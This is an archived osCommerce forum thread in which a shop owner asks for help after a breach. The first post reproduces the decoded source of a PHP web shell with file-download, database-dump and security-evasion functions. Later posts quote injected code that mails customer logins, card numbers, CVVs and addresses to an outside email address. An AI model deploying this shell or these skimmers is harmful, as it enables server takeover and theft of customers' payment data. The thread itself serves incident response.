Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Security Breach with googlemap.php file


devine952

Recommended Posts

Hi all,

 

Somehow my site is being used for spamming purposes, 245K emails sent out last night alone. My customer db is only 30k.

 

anyway, while invesitaging, I found function.php in one of my folders with following permissions rwxr-xr-x. The file was encoded using eval(gzinflate(base64_decode so you can search for that line of code in your files.

 

The decoded code:

<?php
?><?phpif(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>IT-GLOBAL Rooted</h1>");}$language='eng';$auth = 0;$name='93a04b066fd81a1017825f2dcda313b2';  //night$pass='93a04b066fd81a1017825f2dcda313b2';//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8//@setlocale(LC_ALL,'ru_RU.cp1251');@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); @ini_set('allow_url_fopen',1); }else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); }error_reporting(E_ALL);/*  */$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');$downloaders = array('wget','fetch','lynx','links','curl','get');$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html./* realpath() */$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.01234567890";$chars_rlph = "abcdefghijklnmopqrstuvwxyz";$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php','shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root','my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs','access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');/******************************************************************************************************/$win = strtolower(substr(PHP_OS,0,3)) == "win";define("starttime",@getmicrotime());if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};set_magic_quotes_runtime(0);@set_time_limit(0);if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); }else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); }$safe_mode = @ini_get('safe_mode');if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};$version = 'Private - No1';if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST   = &$HTTP_POST_VARS; $_GET    = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; }if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v)  {  $_POST[$k] = stripslashes($v);  } foreach ($_COOKIE as $k=>$v)  {  $_COOKIE[$k] = stripslashes($v);  } }// user + pass ( 1 = no , 0 = yes )if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)   {   header('WWW-Authenticate: Basic realm="No1Relax - Protect !"');   header('HTTP/1.0 401 Unauthorized');   exit("<h1>Access Denied</h1>");   }}if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {	$tempdir='./';	$select_tempdir = '<select name=tempdir><option value="./">./</option>';	foreach( $tempdirs as $item) {		if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}	}	$select_tempdir .= '</select>';	setcookie('tempdir',$tempdir);	setcookie('select_tempdir',$select_tempdir);}else{	if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}	$select_tempdir = $_COOKIE['select_tempdir'];}$head = '<html><head><title>_*-*_[iT-GLOBAL  Rooted]_*-*_</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><STYLE>tr {BORDER-RIGHT:  #000000 1px solid;BORDER-TOP:    #000000 1px solid;BORDER-LEFT:   #000000 1px solid;BORDER-BOTTOM: #000000 1px solid;color: #000000;}td {BORDER-RIGHT:  #aaaaaa 1px solid;BORDER-TOP:    #eeeeee 1px solid;BORDER-LEFT:   #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #ffffff;}.table1 {BORDER: 0px;BACKGROUND-COLOR: #000000;color: #000000;}.td1 {BORDER: 0px;font: 7pt Verdana;color: #ffffff;}.tr1 {BORDER: 0px;color: #ffffff;}table {BORDER:  #eeeeee 1px outset;BACKGROUND-COLOR: #000000;color: #000000;}input {BORDER-RIGHT:  #ffffff 1px solid;BORDER-TOP:    #999999 1px solid;BORDER-LEFT:   #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;}select {BORDER-RIGHT:  #ffffff 1px solid;BORDER-TOP:    #999999 1px solid;BORDER-LEFT:   #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;;}submit {BORDER:  buttonhighlight 2px outset;BACKGROUND-COLOR: #e4e0d8;width: 30%;color: #000000;}textarea {BORDER-RIGHT:  #ffffff 1px solid;BORDER-TOP:    #999999 1px solid;BORDER-LEFT:   #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: Fixedsys bold;color: #ffffff;}BODY {margin: 1px;color: #000000;background-color: #000000;}A:link {COLOR:red; TEXT-DECORATION: none}A:visited { COLOR:red; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:blue;TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){  document.getElementById(id).style.display = \'none\';  document.cookie=id+\'=0;\';}function show_div(id){  document.getElementById(id).style.display = \'block\';  document.cookie=id+\'=1;\';}function change_divst(id){  if (document.getElementById(id).style.display == \'none\')    show_div(id);  else    hide_div(id);}</script>';class zipfile{    var $datasec      = array();    var $ctrl_dir     = array();    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";    var $old_offset   = 0;    function unix2DosTime($unixtime = 0) {        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);        if ($timearray['year'] < 1980) {            $timearray['year']    = 1980;            $timearray['mon']     = 1;            $timearray['mday']    = 1;            $timearray['hours']   = 0;            $timearray['minutes'] = 0;            $timearray['seconds'] = 0;        }        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);    }    function addFile($data, $name, $time = 0)    {        $name     = str_replace('\\', '/', $name);        $dtime    = dechex($this->unix2DosTime($time));        $hexdtime = '\x' . $dtime[6] . $dtime[7]                  . '\x' . $dtime[4] . $dtime[5]                  . '\x' . $dtime[2] . $dtime[3]                  . '\x' . $dtime[0] . $dtime[1];        eval('$hexdtime = "' . $hexdtime . '";');        $fr   = "\x50\x4b\x03\x04";        $fr   .= "\x14\x00";        $fr   .= "\x00\x00";        $fr   .= "\x08\x00";        $fr   .= $hexdtime;        $unc_len = strlen($data);        $crc     = crc32($data);        $zdata   = gzcompress($data);        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);        $c_len   = strlen($zdata);        $fr      .= pack('V', $crc);        $fr      .= pack('V', $c_len);        $fr      .= pack('V', $unc_len);        $fr      .= pack('v', strlen($name));        $fr      .= pack('v', 0);        $fr      .= $name;        $fr .= $zdata;        $this -> datasec[] = $fr;        $cdrec = "\x50\x4b\x01\x02";        $cdrec .= "\x00\x00";        $cdrec .= "\x14\x00";        $cdrec .= "\x00\x00";        $cdrec .= "\x08\x00";        $cdrec .= $hexdtime;        $cdrec .= pack('V', $crc);        $cdrec .= pack('V', $c_len);        $cdrec .= pack('V', $unc_len);        $cdrec .= pack('v', strlen($name) );        $cdrec .= pack('v', 0 );        $cdrec .= pack('v', 0 );        $cdrec .= pack('v', 0 );        $cdrec .= pack('v', 0 );        $cdrec .= pack('V', 32 );        $cdrec .= pack('V', $this -> old_offset );        $this -> old_offset += strlen($fr);        $cdrec .= $name;        $this -> ctrl_dir[] = $cdrec;    }    function file()    {        $data    = implode('', $this -> datasec);        $ctrldir = implode('', $this -> ctrl_dir);        return            $data .            $ctrldir .            $this -> eof_ctrl_dir .            pack('v', sizeof($this -> ctrl_dir)) .            pack('v', sizeof($this -> ctrl_dir)) .            pack('V', strlen($ctrldir)) .            pack('V', strlen($data)) .            "\x00\x00";    }}function compress(&$filename,&$filedump,$compress) {    global $content_encoding;    global $mime_type;    if ($compress == 'bzip' && @function_exists('bzcompress'))     {        $filename  .= '.bz2';        $mime_type = 'application/x-bzip2';        $filedump = bzcompress($filedump);     }     else if ($compress == 'gzip' && @function_exists('gzencode'))     {        $filename  .= '.gz';        $content_encoding = 'x-gzip';        $mime_type = 'application/x-gzip';        $filedump = gzencode($filedump);     }     else if ($compress == 'zip' && @function_exists('gzcompress'))     {     $filename .= '.zip';        $mime_type = 'application/zip';        $zipfile = new zipfile();        $zipfile -> addFile($filedump, substr($filename, 0, -4));        $filedump = $zipfile -> file();     }     else     {     $mime_type = 'application/octet-stream';     } }function moreread($temp){global $lang,$language;$str='';  if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){   if($ffile){     while(!@feof($ffile)){$str .= @fgets($ffile);};     fclose($ffile);   }  }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){   if($ffile){     $str = @fread($ffile, @filesize($temp));     @fclose($ffile);   }  }elseif(@function_exists('file')&&($ffiles = @file($temp))){   foreach ($ffiles as $ffile) { $str .= $ffile; }  }elseif(@function_exists('file_get_contents')){   $str = @file_get_contents($temp);  }elseif(@function_exists('readfile')){   $str = @readfile($temp);  }elseif(@function_exists('highlight_file')){   $str = @highlight_file($temp);  }elseif(@function_exists('show_source')){   $str = @show_source($temp);  }else{echo $lang[$language.'_text56'];}return $str;}function readzlib($filename,$temp=''){global $lang,$language;$str='';  if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};  if(@copy("compress.zlib://".$filename, $temp)) {   $str = moreread($temp);  } else echo $lang[$language.'_text119'];  @unlink($temp);return $str;}function morewrite($temp,$str=''){global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){  if($ffile){   @fwrite($ffile,$str);   @fclose($ffile);  } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){  if($ffile){   @fputs($ffile,$str);   @fclose($ffile);  } }elseif(@function_exists('file_put_contents')){   @file_put_contents($temp,$str); }else return 0;return 1;}function mailattach($to,$from,$subj,$attach) { $headers  = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; }class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db   = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()  {  switch($this->db)     {   case 'MySQL':    if(empty($this->port)) { $this->port = '3306'; }    if(!@function_exists('mysql_connect')) return 0;    $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);    if(is_resource($this->connection)) return 1;   break;   case 'MSSQL':      if(empty($this->port)) { $this->port = '1433'; }    if(!@function_exists('mssql_connect')) return 0;    $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);      if($this->connection) return 1;   break;   case 'PostgreSQL':      if(empty($this->port)) { $this->port = '5432'; }      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";      if(!@function_exists('pg_connect')) return 0;      $this->connection = @pg_connect($str);      if(is_resource($this->connection)) return 1;   break;   case 'Oracle':      if(!@function_exists('ocilogon')) return 0;      $this->connection = @ocilogon($this->user, $this->pass, $this->base);      if(is_resource($this->connection)) return 1;   break;   case 'MySQLi':    if(empty($this->port)) { $this->port = '3306'; }    if(!@function_exists('mysqli_connect')) return 0;    $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);    if(is_resource($this->connection)) return 1;   break;   case 'mSQL':    if(!@function_exists('msql_connect')) return 0;    $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);    if(is_resource($this->connection)) return 1;   break;   case 'SQLite':    if(!@function_exists('sqlite_open')) return 0;    $this->connection = @sqlite_open($this->base);    if(is_resource($this->connection)) return 1;   break;     }    return 0;  } function select_db()  {   switch($this->db)    {  case 'MySQL':   if(@mysql_select_db($this->base,$this->connection)) return 1;  break;  case 'MSSQL':   if(@mssql_select_db($this->base,$this->connection)) return 1;  break;  case 'PostgreSQL':     return 1;  break;  case 'Oracle':     return 1;  break;  case 'MySQLi':     return 1;  break;  case 'mSQL':     if(@msql_select_db($this->base,$this->connection)) return 1;  break;  case 'SQLite':     return 1;  break;    } return 0;  } function query($query)  {   $this->res=$this->error='';   switch($this->db)    {  case 'MySQL':     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))      {      $this->error = @mysql_error($this->connection);      return 0;      }     else if(is_resource($this->res)) { return 1; }     return 2;  break;  case 'MSSQL':     if(false===($this->res=@mssql_query($query,$this->connection)))      {      $this->error = 'Query error';      return 0;      }      else if(@mssql_num_rows($this->res) > 0) { return 1; }     return 2;  break;  case 'PostgreSQL':     if(false===($this->res=@pg_query($this->connection,$query)))      {      $this->error = @pg_last_error($this->connection);      return 0;      }      else if(@pg_num_rows($this->res) > 0) { return 1; }     return 2;  break;  case 'Oracle':     if(false===($this->res=@ociparse($this->connection,$query)))      {      $this->error = 'Query parse error';      }     else      {      if(@ociexecute($this->res))       {       if(@ocirowcount($this->res) != 0) return 2;       return 1;       }      $error = @ocierror();      $this->error=$error['message'];      }  break;  case 'MySQLi':     if(false===($this->res=@mysqli_query($this->connection,$query)))      {      $this->error = @mysqli_error($this->connection);      return 0;      }     else if(is_resource($this->res)) { return 1; }     return 2;  break;  case 'mSQL':     if(false===($this->res=@msql_query($query,$this->connection)))      {      $this->error = @msql_error($this->connection);      return 0;      }     else if(is_resource($this->res)) { return 1; }     return 2;  break;  case 'SQLite':     if(false===($this->res=@sqlite_query($this->connection,$query)))      {      $this->error = @sqlite_error_string($this->connection);      return 0;      }     else if(is_resource($this->res)) { return 1; }     return 2;  break;    }  return 0;  } function get_result()  {   $this->rows=array();   $this->columns=array();   $this->num_rows=$this->num_fields=0;   switch($this->db)    {  case 'MySQL':   $this->num_rows=@mysql_num_rows($this->res);   $this->num_fields=@mysql_num_fields($this->res);   while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));   @mysql_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'MSSQL':   $this->num_rows=@mssql_num_rows($this->res);   $this->num_fields=@mssql_num_fields($this->res);   while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));   @mssql_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};  break;  case 'PostgreSQL':   $this->num_rows=@pg_num_rows($this->res);   $this->num_fields=@pg_num_fields($this->res);   while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));   @pg_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'Oracle':     $this->num_fields=@ocinumcols($this->res);     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;     @ocifreestatement($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'MySQLi':     $this->num_rows=@mysqli_num_rows($this->res);     $this->num_fields=@mysqli_num_fields($this->res);     while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));     @mysqli_free_result($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'mSQL':     $this->num_rows=@msql_num_rows($this->res);     $this->num_fields=@msql_num_fields($this->res);     while(false !== ($this->rows[] = @msql_fetch_array($this->res)));     @msql_free_result($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'SQLite':     $this->num_rows=@sqlite_num_rows($this->res);     $this->num_fields=@sqlite_num_fields($this->res);     while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;    }   return 0;  } function dump($table)  {   if(empty($table)) return 0;   $this->dump=array();   $this->dump[0] = '##';   $this->dump[1] = '## --------------------------------------- ';   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");   $this->dump[3] = '## Database: '.$this->base;   $this->dump[4] = '##    Table: '.$table;   $this->dump[5] = '## --------------------------------------- ';   switch($this->db)    {  case 'MySQL':     $this->dump[0] = '## MySQL dump';     if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;     if(!$this->get_result()) return 0;     $this->dump[] = $this->rows[0]['Create Table'];     $this->dump[] = '## --------------------------------------- ';     if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'MSSQL':     $this->dump[0] = '## MSSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'PostgreSQL':     $this->dump[0] = '## PostgreSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'Oracle':     $this->dump[0] = '## ORACLE dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'MySQLi':     $this->dump[0] = '## MySQLi dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'mSQL':     $this->dump[0] = '## mSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'SQLite':     $this->dump[0] = '## SQLite dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  default:     return 0;  break;    }   return 1;  } function close()  {   switch($this->db)    {  case 'MySQL':     @mysql_close($this->connection);  break;  case 'MSSQL':     @mssql_close($this->connection);  break;  case 'PostgreSQL':     @pg_close($this->connection);  break;  case 'Oracle':     @oci_close($this->connection);  break;  case 'MySQLi':     @mysqli_close($this->connection);  break;  case 'mSQL':     @msql_close($this->connection);  break;  case 'SQLite':     @sqlite_close($this->connection);  break;    }  } function affected_rows()  {   switch($this->db)    {  case 'MySQL':   return @mysql_affected_rows($this->res);  break;  case 'MSSQL':     return @mssql_affected_rows($this->res);  break;  case 'PostgreSQL':     return @pg_affected_rows($this->res);  break;  case 'Oracle':     return @ocirowcount($this->res);  break;  case 'MySQLi':     return @mysqli_affected_rows($this->res);  break;  case 'mSQL':     return @msql_affected_rows($this->res);  break;  case 'SQLite':     return @sqlite_changes($this->res);  break;  default:     return 0;  break;    }  } }if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) {  if($file=moreread($_POST['d_name'])){ $filedump = $file; }  else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }  if(!empty($_POST['cmd']))   {    @ob_clean();    $filename = @basename($_POST['d_name']);    $content_encoding=$mime_type='';    compress($filename,$filedump,$_POST['compress']);    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }    header("Content-type: ".$mime_type);    header("Content-disposition: attachment; filename=\"".$filename."\";");    echo $filedump;    exit();   } }if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db   = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#000000>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";  else   {   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";   else    {    foreach($querys as $num=>$query)     {      if(strlen($query)>5)      {      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";      switch($sql->query($query))       {       case '0':       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";       break;       case '1':       if($sql->get_result())        {       echo "<table width=100%>";        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);       $keys = @implode(" </b></font></td><td bgcolor=#000000><font face=Verdana size=-2><b> ", $sql->columns);        echo "<tr><td bgcolor=#000000><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";        for($i=0;$i<$sql->num_rows;$i++)         {         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);         $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);         echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';         }        echo "</table>";        }       break;       case '2':       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";       break;       }      }     }    }   } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."

?>

 

I have no idea what it does, other than apparently dump my sql database.

 

I haven't figured out where it dumps it to and if this same file is also responsible for the spamming originating from my website.

 

Any tips on how to prevent this in the future and what this is doing?

Link to comment
Share on other sites

list of injected files

 

googlemap.php

functiondata.php

function.php

inc.php

private.php

 

creating

 

thumb.php

image.php

 

which I suspect are the dump files

 

I could do with some enlightning, I have noticed that most of these files were able to upload to directories with 502 503 Owner Group as defined by Filezilla, whatever that user group means.

Link to comment
Share on other sites

More malicious code that I found inserted in my /login.php file

 

   $to = "[email protected]";
   $subject = "Hang mail pass pilot";
   $message = $email_address." | ".$password;
   $headers = "MIME-Version: 1.0rn";
   $headers .= "Content-type: text/html; charset=iso-8859-1rn";
   $headers  .= "From: $from\r\n";
   mail($to, $subject, $message, $headers); 

Link to comment
Share on other sites

/public_html/includes/modules/payment/paypal_wpp.php I found this:

 

$to = "[email protected]";
    $subject = "Pilotshop";
   $message =$order_info['PAYPAL_SHIPPING_NAME']."|".$order_info['PAYPAL_SHIPPING_ADDRESS1']."|".$order_info['PAYPAL_SHIPPING_CITY']."|".$order_info['PAYPAL_SHIPPING_STATE']."|".$order_info['PAYPAL_SHIPPING_ZIP']."|".$order_info['PAYPAL_SHIPPING_COUNTRY']."|".$cc_type."|".$cc_number."|".$cc_checkcode."|".$cc_first_name."|".$cc_last_name."|".$cc_owner_ip."|".$cc_expdate_month."|".$cc_expdate_year ;
   $headers = "MIME-Version: 1.0rn";
   $headers .= "Content-type: text/html; charset=iso-8859-1rn";
   $headers  .= "From: $from\r\n";
   mail($to, $subject, $message, $headers);

Link to comment
Share on other sites

another bit in /public/includes/modules/payment/cc.php

 

	  $to = "[email protected]";
    $subject = "Hang ve pilot";
   $message = $HTTP_POST_VARS['cc_owner'] . "|" . $HTTP_POST_VARS['cc_number'] . "|" . $HTTP_POST_VARS['cc_expires_month'] . "|" . $HTTP_POST_VARS['cc_expires_year'] . "|" .$HTTP_POST_VARS['cvvnumber'];
   $headers = "MIME-Version: 1.0rn";
   $headers .= "Content-type: text/html; charset=iso-8859-1rn";
   $headers  .= "From: $from\r\n";
   mail($to, $subject, $message, $headers); 

Link to comment
Share on other sites

more in /checkout_payment.php

 

$check_address_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . (int)$customer_id . "' and address_book_id = '" . (int)$billto . "'");
   $check_address = tep_db_fetch_array($check_address_query);
$to = "[email protected]";
    $subject = "Hang ve dia chi pilot";
   $message = $check_address['entry_firstname']."|".$check_address['entry_lastname']."|".$check_address['entry_street_address']."|".$check_address['entry_suburb']."|".$check_address['entry_postcode']."|".$check_address['entry_city']."|".$check_address['entry_state'];
   $headers = "MIME-Version: 1.0rn";
   $headers .= "Content-type: text/html; charset=iso-8859-1rn";
   $headers  .= "From: $from\r\n";
   mail($to, $subject, $message, $headers); 

Link to comment
Share on other sites

Well, it's an interesting and different type of hack from others seen recently it seems, but I am pretty sure the answers for securing your site properly are still the same as ever. Best delete the site and database and restore from a clean back up, if you are able to, and then read the threads/posts in various links I listed here, especially the first one, and apply all necessary measures.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...